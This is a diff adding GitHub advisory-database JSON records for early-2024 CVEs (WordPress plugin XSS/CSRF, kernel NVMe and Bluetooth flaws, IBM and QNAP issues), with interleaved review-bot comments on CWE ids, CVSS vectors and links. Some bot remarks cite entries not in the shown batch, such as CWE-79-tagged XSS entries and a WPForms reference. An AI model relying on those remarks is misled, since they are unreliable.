a/advisories/unreviewed/2024/02/GHSA-v8v7-r333-8h8w/GHSA-v8v7-r333-8h8w.json b/advisories/unreviewed/2024/02/GHSA-v8v7-r333-8h8w/GHSA-v8v7-r333-8h8w.json new file mode 100644 index 0000000000000..d17ea51de542d --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-v8v7-r333-8h8w/GHSA-v8v7-r333-8h8w.json 
@@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v8v7-r333-8h8w", + "modified": "2024-02-03T00:31:34Z", + "published": "2024-02-03T00:31:34Z", + "aliases": [ + "CVE-2024-1199" + ], + "details": "A vulnerability has been found in CodeAstro Employee Task Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file \\employee-tasks-php\\attendance-info.php. The manipulation of the argument aten_id leads to denial of service. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252697 was assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1199" + }, + { + "type": "WEB", + "url": "https://docs.qq.com/doc/DYnhIWEdkZXViTXdD" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252697" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252697" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-404" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-03T00:15:44Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-v8xr-j3gp-fmxj/GHSA-v8xr-j3gp-fmxj.json b/advisories/unreviewed/2024/02/GHSA-v8xr-j3gp-fmxj/GHSA-v8xr-j3gp-fmxj.json new file mode 100644 index 0000000000000..d02750c66a680 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-v8xr-j3gp-fmxj/GHSA-v8xr-j3gp-fmxj.json 
@@ -0,0 +1,54 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v8xr-j3gp-fmxj", + "modified": "2024-02-07T21:30:27Z", + "published": "2024-02-07T21:30:27Z", + "aliases": [ + "CVE-2023-6535" + ], + "details": "A flaw was found in the Linux kernel's NVMe driver. This issue may allow an unauthenticated malicious actor to send a set of crafted TCP packages when using NVMe over TCP, leading the NVMe driver to a NULL pointer dereference in the NVMe driver, causing kernel panic and a denial of service.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6535" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0723" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0724" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0725" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2023-6535" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2254053" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-476" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T21:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-v92p-76ff-mghv/GHSA-v92p-76ff-mghv.json b/advisories/unreviewed/2024/02/GHSA-v92p-76ff-mghv/GHSA-v92p-76ff-mghv.json new file mode 100644 index 0000000000000..284ce1fbf8003 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-v92p-76ff-mghv/GHSA-v92p-76ff-mghv.json 
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v92p-76ff-mghv", + "modified": "2024-02-06T00:30:26Z", + "published": "2024-02-06T00:30:26Z", + "aliases": [ + "CVE-2023-6983" + ], + "details": "The Display custom fields in the frontend – Post and User Profile Fields plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.2.1 via the vg_display_data shortcode due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with contributor-level access and above, to retrieve potentially sensitive post meta.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6983" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3021133%40shortcode-to-display-post-and-user-data&new=3021133%40shortcode-to-display-post-and-user-data&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/08d43c67-df40-4f1a-a351-803e59edee13?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-v96m-4x27-3m5j/GHSA-v96m-4x27-3m5j.json b/advisories/unreviewed/2024/02/GHSA-v96m-4x27-3m5j/GHSA-v96m-4x27-3m5j.json new file mode 100644 index 0000000000000..2b673aad931f1 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-v96m-4x27-3m5j/GHSA-v96m-4x27-3m5j.json 
@@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v96m-4x27-3m5j", + "modified": "2024-02-07T15:30:49Z", + "published": "2024-02-07T15:30:49Z", + "aliases": [ + "CVE-2024-24189" + ], + "details": "Jsish v3.5.0 (commit 42c694c) was discovered to contain a use-after-free via the SplitChar at ./src/jsiUtils.c.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24189" + }, + { + "type": "WEB", + "url": "https://github.com/pcmacdon/jsish/issues/101" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T14:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-v9vx-4mxw-76j2/GHSA-v9vx-4mxw-76j2.json b/advisories/unreviewed/2024/02/GHSA-v9vx-4mxw-76j2/GHSA-v9vx-4mxw-76j2.json new file mode 100644 index 0000000000000..5e257020e365d --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-v9vx-4mxw-76j2/GHSA-v9vx-4mxw-76j2.json 
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v9vx-4mxw-76j2", + "modified": "2024-02-05T15:30:23Z", + "published": "2024-02-05T15:30:23Z", + "aliases": [ + "CVE-2023-7216" + ], + "details": "A path traversal vulnerability was found in the CPIO utility. This issue could allow a remote unauthenticated attacker to trick a user into opening a specially crafted archive. During the extraction process, the archiver could follow symlinks outside of the intended directory, which could be utilized to run arbitrary commands on the target system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-7216" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2023-7216" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2249901" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-59" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T15:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-vf69-288w-g5cx/GHSA-vf69-288w-g5cx.json b/advisories/unreviewed/2024/02/GHSA-vf69-288w-g5cx/GHSA-vf69-288w-g5cx.json new file mode 100644 index 0000000000000..f33b43f700f5e --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-vf69-288w-g5cx/GHSA-vf69-288w-g5cx.json 
@@ -0,0 +1,66 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vf69-288w-g5cx", + "modified": "2024-02-08T06:30:23Z", + "published": "2024-02-08T06:30:23Z", + "aliases": [ + "CVE-2023-5665" + ], + "details": "The Payment Forms for Paystack plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes in all versions up to, and including, 3.4.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5665" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/payment-forms-for-paystack/tags/3.4.1/public/class-paystack-forms-public-for-old-themes.php#L1013" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/payment-forms-for-paystack/tags/3.4.1/public/class-paystack-forms-public-for-old-themes.php#L1054" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/payment-forms-for-paystack/tags/3.4.1/public/class-paystack-forms-public-for-old-themes.php#L1128" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/payment-forms-for-paystack/tags/3.4.1/public/class-paystack-forms-public-for-old-themes.php#L1164" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/payment-forms-for-paystack/tags/3.4.1/public/class-paystack-forms-public-for-old-themes.php#L1194" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/payment-forms-for-paystack/tags/3.4.1/public/class-paystack-forms-public-for-old-themes.php#L958" + }, + { + "type": "WEB", + 
"url": "https://plugins.trac.wordpress.org/browser/payment-forms-for-paystack/tags/3.4.1/public/class-paystack-forms-public-for-old-themes.php#L986" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/98f80608-f24f-4019-a757-de71cba9902f?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T04:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-vg2x-vpgh-c7jj/GHSA-vg2x-vpgh-c7jj.json b/advisories/unreviewed/2024/02/GHSA-vg2x-vpgh-c7jj/GHSA-vg2x-vpgh-c7jj.json new file mode 100644 index 0000000000000..ad83ab2798bbc --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-vg2x-vpgh-c7jj/GHSA-vg2x-vpgh-c7jj.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vg2x-vpgh-c7jj", + "modified": "2024-02-02T03:30:32Z", + "published": "2024-02-02T03:30:32Z", + "aliases": [ + "CVE-2023-50936" + ], + "details": "IBM PowerSC 1.3, 2.0, and 2.1 does not invalidate session after logout which could allow an authenticated user to impersonate another user on the system. IBM X-Force ID: 275116.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50936" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/275116" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7113759" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-613" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T01:15:08Z" + } +} \ No newline at end of file 
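Review bot: GHSA-vf69-288w-g5cx describes a stored cross-site scripting issue but leaves `cwe_ids` empty, while the other XSS entries in this batch record `"cwe_ids": ["CWE-79"]`; the same value belongs here for consistency. All eight references point at line anchors in the vulnerable tag `3.4.1` and none at a fixed release or changeset, so a reader cannot tell from this file whether a fix exists; if the Wordfence page names a patched version, a reference to that changeset would be more useful than the seventh line anchor into the same file.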
diff --git a/advisories/unreviewed/2024/02/GHSA-vg4f-g292-cmwp/GHSA-vg4f-g292-cmwp.json b/advisories/unreviewed/2024/02/GHSA-vg4f-g292-cmwp/GHSA-vg4f-g292-cmwp.json new file mode 100644 index 0000000000000..b41c21a13093c --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-vg4f-g292-cmwp/GHSA-vg4f-g292-cmwp.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vg4f-g292-cmwp", + "modified": "2024-02-02T18:30:31Z", + "published": "2024-02-02T18:30:31Z", + "aliases": [ + "CVE-2023-45026" + ], + "details": "A path traversal vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to read the contents of unexpected files and expose sensitive data via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.5.2645 build 20240116 and later\nQuTS hero h5.1.5.2647 build 20240118 and later\nQuTScloud c5.1.5.2651 and later\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45026" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-24-02" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:50Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-vh22-7653-gg93/GHSA-vh22-7653-gg93.json b/advisories/unreviewed/2024/02/GHSA-vh22-7653-gg93/GHSA-vh22-7653-gg93.json new file mode 100644 index 0000000000000..a931299d2d79b --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-vh22-7653-gg93/GHSA-vh22-7653-gg93.json 
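Review bot: The CVSS vector in GHSA-vg4f-g292-cmwp, `CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:L`, scores confidentiality impact as None, yet the `details` text says the flaw lets administrators "read the contents of unexpected files and expose sensitive data". Those two statements cannot both be right; a file-read path traversal is a confidentiality issue, and the vector would normally carry at least `C:L`. The vector appears to be mirrored from the vendor or NVD, so the fix is to re-check the upstream score and, if the vendor entry is itself inconsistent, note that in the advisory rather than silently inheriting it.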
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vh22-7653-gg93", + "modified": "2024-02-02T06:30:31Z", + "published": "2024-02-02T06:30:31Z", + "aliases": [ + "CVE-2023-38263" + ], + "details": "IBM SOAR QRadar Plugin App 1.0 through 5.0.3 could allow an authenticated user to perform unauthorized actions due to improper access controls. IBM X-Force ID: 260577.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-38263" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/260577" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7111679" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T04:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-vh8x-63x5-57cx/GHSA-vh8x-63x5-57cx.json b/advisories/unreviewed/2024/02/GHSA-vh8x-63x5-57cx/GHSA-vh8x-63x5-57cx.json new file mode 100644 index 0000000000000..3488a3e99d97d --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-vh8x-63x5-57cx/GHSA-vh8x-63x5-57cx.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vh8x-63x5-57cx", + "modified": "2024-02-08T00:32:18Z", + "published": "2024-02-05T18:31:37Z", + "aliases": [ + "CVE-2024-24262" + ], + "details": "media-server v1.0.0 was discovered to contain a Use-After-Free (UAF) vulnerability via the sip_uac_stop_timer function at /uac/sip-uac-transaction.c.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24262" + }, + { + "type": "WEB", + "url": "https://github.com/LuMingYinDetect/media-server_detect/blob/main/media_server_detect_1.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-416" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T18:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-vhh3-wrc8-frc4/GHSA-vhh3-wrc8-frc4.json b/advisories/unreviewed/2024/02/GHSA-vhh3-wrc8-frc4/GHSA-vhh3-wrc8-frc4.json new file mode 100644 index 0000000000000..c17254b3e2cf1 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-vhh3-wrc8-frc4/GHSA-vhh3-wrc8-frc4.json 
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vhh3-wrc8-frc4", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-0796" + ], + "details": "The Active Products Tables for WooCommerce. Professional products tables for WooCommerce store plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.6.1. This is due to missing or incorrect nonce validation on several functions corresponding to AJAX actions. This makes it possible for unauthenticated attackers to invoke those functions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0796" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3029488/profit-products-tables-for-woocommerce/trunk?contextall=1&old=3005088&old_path=%2Fprofit-products-tables-for-woocommerce%2Ftrunk" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5069fbc4-b3c4-4c0b-892c-2c83f35dc2fe?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-vj2q-j7r5-rxmc/GHSA-vj2q-j7r5-rxmc.json b/advisories/unreviewed/2024/02/GHSA-vj2q-j7r5-rxmc/GHSA-vj2q-j7r5-rxmc.json new file mode 100644 index 0000000000000..d3571441e7832 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-vj2q-j7r5-rxmc/GHSA-vj2q-j7r5-rxmc.json 
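Review bot: GHSA-vhh3-wrc8-frc4 is a cross-site request forgery advisory ("missing or incorrect nonce validation on several functions corresponding to AJAX actions") but `cwe_ids` is empty; `"cwe_ids": ["CWE-352"]` is the matching classification. Leaving it blank means CWE-based queries over the database will miss this entry even though the description is unambiguous.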
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vj2q-j7r5-rxmc", + "modified": "2024-02-05T09:30:28Z", + "published": "2024-02-05T09:30:28Z", + "aliases": [ + "CVE-2024-24860" + ], + "details": "A race condition was found in the Linux kernel's bluetooth device driver in {min,max}_key_size_set() function. This can result in a null pointer dereference issue, possibly leading to a kernel panic or denial of service issue.\n\n\n\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:H/PR:H/UI:R/S:U/C:H/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24860" + }, + { + "type": "WEB", + "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=8151" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-362" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T08:15:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-vj5p-c5rg-hm3w/GHSA-vj5p-c5rg-hm3w.json b/advisories/unreviewed/2024/02/GHSA-vj5p-c5rg-hm3w/GHSA-vj5p-c5rg-hm3w.json new file mode 100644 index 0000000000000..26c94fa9e30c1 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-vj5p-c5rg-hm3w/GHSA-vj5p-c5rg-hm3w.json 
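Review bot: The CVSS vector recorded for GHSA-vj2q-j7r5-rxmc, `CVSS:3.1/AV:A/AC:H/PR:H/UI:R/S:U/C:H/I:L/A:N`, claims high confidentiality impact and no availability impact, while the `details` text describes a null pointer dereference "possibly leading to a kernel panic or denial of service". A kernel null-deref crash is an availability problem, so `A:N` with `C:H` looks inverted relative to the description; the vector seems to be taken as published upstream and should be checked against the linked bug before it is relied on. Separately, the `details` string ends in five trailing `\n` characters, which is harmless to parsers but renders as blank space and should be trimmed on import.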
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vj5p-c5rg-hm3w", + "modified": "2024-02-02T03:30:32Z", + "published": "2024-02-02T03:30:32Z", + "aliases": [ + "CVE-2023-50935" + ], + "details": "IBM PowerSC 1.3, 2.0, and 2.1 fails to properly restrict access to a URL or resource, which may allow a remote attacker to obtain unauthorized access to application functionality and/or resources. IBM X-Force ID: 275115.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50935" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/275115" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7113759" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-425" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T02:15:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-vj6f-c5mv-86jm/GHSA-vj6f-c5mv-86jm.json b/advisories/unreviewed/2024/02/GHSA-vj6f-c5mv-86jm/GHSA-vj6f-c5mv-86jm.json new file mode 100644 index 0000000000000..c2af4770ad569 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-vj6f-c5mv-86jm/GHSA-vj6f-c5mv-86jm.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vj6f-c5mv-86jm", + "modified": "2024-02-08T00:32:19Z", + "published": "2024-02-05T18:31:37Z", + "aliases": [ + "CVE-2024-24266" + ], + "details": "gpac v2.2.1 was discovered to contain a Use-After-Free (UAF) vulnerability via the dasher_configure_pid function at /src/filters/dasher.c.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24266" + }, + { + "type": "WEB", + "url": "https://github.com/yinluming13579/gpac_defects/blob/main/gpac_2.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-416" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T18:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-vj7x-j42w-v27g/GHSA-vj7x-j42w-v27g.json b/advisories/unreviewed/2024/02/GHSA-vj7x-j42w-v27g/GHSA-vj7x-j42w-v27g.json new file mode 100644 index 0000000000000..008c2da815e6c --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-vj7x-j42w-v27g/GHSA-vj7x-j42w-v27g.json 
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vj7x-j42w-v27g", + "modified": "2024-02-06T00:30:25Z", + "published": "2024-02-06T00:30:25Z", + "aliases": [ + "CVE-2023-6526" + ], + "details": "The Meta Box – WordPress Custom Fields Framework plugin for WordPress is vulnerable to Stored Cross-Site Scripting via custom post meta values displayed through the plugin's shortcode in all versions up to, and including, 5.9.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6526" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030376%40meta-box&new=3030376%40meta-box&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2a6bfc87-6135-4d49-baa2-e8e6291148dc?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-vjf4-hw94-9q25/GHSA-vjf4-hw94-9q25.json b/advisories/unreviewed/2024/02/GHSA-vjf4-hw94-9q25/GHSA-vjf4-hw94-9q25.json new file mode 100644 index 0000000000000..a273d56df3ce5 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-vjf4-hw94-9q25/GHSA-vjf4-hw94-9q25.json 
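Review bot: The changeset reference in GHSA-vj7x-j42w-v27g compares a revision to itself (`old=3030376%40meta-box&new=3030376%40meta-box`), so following it yields an empty diff instead of the fix for the shortcode escaping issue. The link should point at the previous tag or changeset as `old` and `3030376` as `new`, matching the shape of the WPForms reference elsewhere in this batch. Like the other stored XSS entries here, `cwe_ids` should also carry `"CWE-79"` rather than being empty.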
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vjf4-hw94-9q25", + "modified": "2024-02-02T09:30:20Z", + "published": "2024-02-02T09:30:20Z", + "aliases": [ + "CVE-2023-43756" + ], + "details": "\nin OpenHarmony v3.2.4 and prior versions allow a local attacker causes information leak through out-of-bounds Read.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43756" + }, + { + "type": "WEB", + "url": "https://gitee.com/openharmony/security/blob/master/zh/security-disclosure/2024/2024-02.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-125" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T07:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-vjv2-8c96-r6jw/GHSA-vjv2-8c96-r6jw.json b/advisories/unreviewed/2024/02/GHSA-vjv2-8c96-r6jw/GHSA-vjv2-8c96-r6jw.json new file mode 100644 index 0000000000000..9f3a6c558db78 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-vjv2-8c96-r6jw/GHSA-vjv2-8c96-r6jw.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vjv2-8c96-r6jw", + "modified": "2024-02-06T15:32:06Z", + "published": "2024-02-06T15:32:06Z", + "aliases": [ + "CVE-2023-5584" + ], + "details": "Rejected reason: We have rejected this CVE as it was determined a non-security issue by the vendor.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5584" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T15:15:08Z" + } +} \ No newline at end of file 
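Review bot: The `details` text of GHSA-vjf4-hw94-9q25 is truncated: it starts with a newline and the lowercase fragment "in OpenHarmony v3.2.4 and prior versions allow a local attacker ...", so the subject of the sentence (which component or module has the out-of-bounds read) is missing. This appears to be inherited from the NVD record; the leading `\n` and trailing `\n\n` should at least be stripped on import, and the missing component name should be taken from the linked gitee security-disclosure page rather than guessed.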
